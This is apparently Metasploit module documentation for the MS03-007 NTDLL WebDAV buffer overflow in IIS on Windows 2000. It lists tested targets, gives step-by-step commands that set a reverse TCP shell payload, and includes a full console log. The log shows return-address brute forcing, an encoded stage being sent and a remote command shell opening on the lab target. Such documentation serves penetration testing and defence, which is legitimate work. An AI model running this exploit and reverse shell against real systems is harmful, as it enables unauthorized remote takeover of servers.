## Vulnerable Application This exploits a buffer overflow in NTDLL.dll on Windows 2000 through the SEARCH WebDAV method in IIS. This particular module only works against Windows 2000. It should have a reasonable chance of success against SP0 to SP3. This module has been tested successfully on: * Windows 2000 Professional SP0 (EN) * Windows 2000 Professional SP0 (FI) * Windows 2000 Professional SP0 (NL) * Windows 2000 Professional SP0 (TR) * Windows 2000 Professional SP1 (AR) * Windows 2000 Professional SP1 (CZ) * Windows 2000 Professional SP1 (EN) * Windows 2000 Professional SP2 (EN) * Windows 2000 Professional SP2 (FR) * Windows 2000 Professional SP2 (PT) * Windows 2000 Professional SP3 (EN) * Windows 2000 Server SP0 (DE) * Windows 2000 Server SP0 (EN) * Windows 2000 Server SP0 (ES) * Windows 2000 Server SP0 (FR) * Windows 2000 Server SP0 (HU) * Windows 2000 Server SP0 (NL) * Windows 2000 Server SP0 (PT) * Windows 2000 Server SP0 (TR) * Windows 2000 Server SP1 (EN) * Windows 2000 Server SP1 (SE) * Windows 2000 Server SP2 (EN) * Windows 2000 Server SP2 (RU) * Windows 2000 Server SP3 (DE) * Windows 2000 Server SP3 (IT) ## Verification Steps 1. `use exploit/windows/iis/ms03_007_ntdll_webdav` 1. `set RHOSTS [IP]` 1. `set PAYLOAD windows/shell/reverse_tcp` 1. `set LHOST [IP]` 1. `run` ## Options ## Scenarios ### Windows 2000 Professional SP1 (EN) ``` msf6 > use exploit/windows/iis/ms03_007_ntdll_webdav [*] Using configured payload windows/shell/reverse_tcp msf6 exploit(windows/iis/ms03_007_ntdll_webdav) > set rhosts 192.168.200.195 rhosts => 192.168.200.195 msf6 exploit(windows/iis/ms03_007_ntdll_webdav) > set lhost 192.168.200.130 lhost => 192.168.200.130 msf6 exploit(windows/iis/ms03_007_ntdll_webdav) > check [+] 192.168.200.195:80 - The target is vulnerable. We've hit a server error (exception) msf6 exploit(windows/iis/ms03_007_ntdll_webdav) > run [*] Started reverse TCP handler on 192.168.200.130:4444 [*] Trying return address 0x004e004f (1 / 88)... [-] Attempt failed: Connection reset by peer [*] Checking if IIS is back up after a failed attempt... [-] Connection failed (1 of 20)... [-] Connection failed (2 of 20)... [-] Connection failed (3 of 20)... [-] Connection failed (4 of 20)... [*] Trying return address 0x00ce004f (2 / 88)... [-] Attempt failed: Connection reset by peer [*] Checking if IIS is back up after a failed attempt... [-] Connection failed (1 of 20)... [-] Connection failed (2 of 20)... [*] Trying return address 0x00ce0041 (3 / 88)... [-] Attempt failed: Connection reset by peer [*] Checking if IIS is back up after a failed attempt... [-] Connection failed (1 of 20)... [-] Connection failed (2 of 20)... [-] Connection failed (3 of 20)... [-] Connection failed (4 of 20)... [*] Trying return address 0x00430041 (4 / 88)... [-] Attempt failed: Connection reset by peer [*] Checking if IIS is back up after a failed attempt... [-] Connection failed (1 of 20)... [-] Connection failed (2 of 20)... [*] Trying return address 0x00b40041 (5 / 88)... [*] Encoded stage with x86/shikata_ga_nai [*] Sending encoded stage (267 bytes) to 192.168.200.195 [*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.195:1066) at 2022-07-07 06:13:21 -0400 Shell Banner: Microsoft Windows 2000 [Version 5.00.2195] ----- C:\WINNT\system32>ver ver Microsoft Windows 2000 [Version 5.00.2195] C:\WINNT\system32> ```